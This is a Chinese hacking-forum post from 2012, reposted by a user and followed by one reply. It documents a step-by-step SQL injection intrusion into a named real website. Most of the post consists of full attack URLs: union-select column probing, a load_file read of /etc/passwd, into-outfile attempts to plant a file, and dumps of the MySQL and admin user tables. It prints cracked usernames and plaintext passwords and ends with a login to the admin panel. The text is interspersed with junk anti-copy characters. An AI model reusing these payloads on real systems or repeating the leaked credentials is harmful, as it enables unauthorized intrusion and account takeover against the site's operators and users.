找回密码
 立即注册
查看: 4251|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
- R# ]* c  M* K1 c9 D' n
  [: l8 x! V9 |
0x01. 检测 www.zuaa.jp 收集数据. m$ n2 Q) f0 s: E

8 i. d) t' Z$ i7 j: T- d" h: s; B. u) j: n8 W5 u
whatweb! [* s* S9 O/ z
" i  O/ E9 `6 Q' x. c9 F

$ @. U" B8 h  }2 Q' B利用NMAP扫描, v' ?2 A, X" Q3 l/ [

1 f! A9 N# c9 v! d中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 g3 n/ d' F, U/ l7 q
0x02.找注入点& }/ r' Q4 M- n( O
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
: ?+ }; k9 d* k" c& b
/ u( L0 z: m+ c' j& @0 z! p; E. e) {8 o% h* m; Z
0x03.order by* j, A) \: D6 V/ j! Z
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
9 v' f" d/ h$ q6 S
0 y$ n4 W( z# K) u' J9 ^order by 28报错,order by 27正常
5 U4 N! t8 G+ D0 C+ [" `. J5 ~8 ^
0x04.   union手动查询* b: ^- o" T& X6 e
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 c- M7 \; x  v
添加到 27 时正常显示
1 m6 Y9 h* V7 O# J3 W0 q. L( u
$ F0 Z* Z0 j8 B0 A- \中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持9 ^% a0 Z; ?3 U: L" a* h+ r

6 M  M& m. _# R: c0x05. info:
  x$ v; X& d! Q; C, [http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
& m( N8 Q/ l, r4 p' ~$ A6 j2 v  w- o: X7 ?
user:            root@localhost
. T2 J+ N4 p0 W3 j! ^9 bdatabase:    openpne7 }- B* P+ N. v. E0 @# M, R2 J5 u# E
version:      4.1.22* H; A; [: x( ^
os:             portbld-freebsd5.4
& Z  s$ L6 ?5 l3 @5 `- b  R, w+ p4 n0 w  {
0x06. root用户
* p7 P6 k4 N1 p7 k6 |) T利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)% t: h" p5 n) {  N6 B2 ]) w6 }
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 , p" Q  g0 a: u4 W
$ U  x# C5 ~8 m4 p! }
通过工具转换. p: V) d4 \! @. J

- K2 t) ^+ _6 x; N7 I6 W- L中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  b. }4 L: k. |( I- q4 @
9 a8 @& H! c8 R9 M" C, k$ k0x07. 利用 into outfile
; C4 b6 j' x7 O6 l全部都失败; q7 p  M4 Q% [
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% P; x; F3 w6 B/ X* P" o" v$ w4 r5 G/ z5 h! l# t9 K% t* @6 S
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
( g! h% x  Q% L* H) {' v
6 w+ _% S2 @4 u% h, H) _4 E* l/ ^页面显示“MDB2 Error:syntax error”; r/ M* v' ?( {; A1 |; B9 b

( x) l- c/ X6 T0x08. 利用 mysql 4.1
9 O% ~' }  U2 p猜常规表名,字段未果 工具 sqlmap
* ]& c- C1 {; G6 W' P中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
9 E" K( P8 H; l
+ \; Q5 ]. `5 j; m$ ^% M# k% c: I* Y. a- S. s# Q3 ^: s

! ~; j9 A# \4 `" f& ^3 v0x09. 查找后台$ {; R% x' x1 t
利用 现有的各种 后台工具尝试都不行
6 P: m6 S, O# ^0 `7 O% K8 p; z$ ^8 G) P" Z1 Y2 b1 H
0x10.  MySL外联方法% d* P  g2 y3 t% p
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行$ k; f/ |8 v* L7 g* C) k$ t  z
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user+ h8 r' U- j2 D) s
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
" c$ R& a4 D; g! w$ Y( b/ T, A
; j  u9 j$ _  s# v这个可以在 www.cmd5.com 解密! [' V' [) m3 C7 g
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009/ Q& i; J6 X, Z* y7 v& T
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
# x' @9 P; J2 O  aopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???9 x( f" ?! f/ P- V7 t; S* y3 G
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! M$ ]' w9 f2 H4 ]1 t% O工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知4 G; V. j+ I/ W3 s* a
, V9 j- L& w1 ?  m5 f
: Y7 ^) ~! S. @1 x# u
0x11. 网站突破+ Y1 P: i% ?0 c- s  `4 w3 R
发现网站的源程序 openpne, google 下载 openpne 源码% R" U' ]" y3 |" k* ?) p1 h- C

& w- l5 u6 c# D$ \& e3 Q: v% |( y- I( k3 j9 X& a
0x12. 默认信息利用3 m$ Z& T  j6 C3 l7 W# }% [4 U' a
http://sns.zuaa.jp/?m=admin&a=page_login0 n/ _: q, b7 ~( k
. ~$ J6 O4 {' G0 Z
表名 (c_admin_user) ,字段名(username,password)9 C( c0 p3 |3 M* y, R8 s
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
( |) ]8 ]7 r1 `8 u1 ?
5 {2 y  k0 {. y' |) r解密
5 @! |; E) m8 v( A/ E$ w! ]zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20092 f/ E# n# m) M+ n0 ?4 Q
zuaajp:c0923ec5857796a393da99905008c176,          zju1897, t/ d8 i8 r/ y+ Q  u! W- q8 Y
) j( F0 L9 M$ G5 R9 A2 y- e& i; e* J' ~
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 s7 i# I; L) k* c

0 x( l* M. ~  Q3 k$ h9 x0 S0x13. 登录后台
1 J6 F1 p6 Z( [, W7 r& q1 i5 d4 n& U6 D2 ?
  r7 F" W4 A& j6 x( ^1 L" K' o
, o" F% Q) h" E1 Z) w  W
0x14. 小结" s+ R  ?9 ?; ]
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
9 @) ^4 ]3 ]! D# v  x感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点% l7 K& I* W* t
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain  Q: W8 E# F. L1 [
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ X7 d- W2 {( e$ X' S4 g; S2 o

9 s, S( q* M& V7 {) y# [0 T最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
9 E) m; k5 S7 ~4 G2 j) j

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表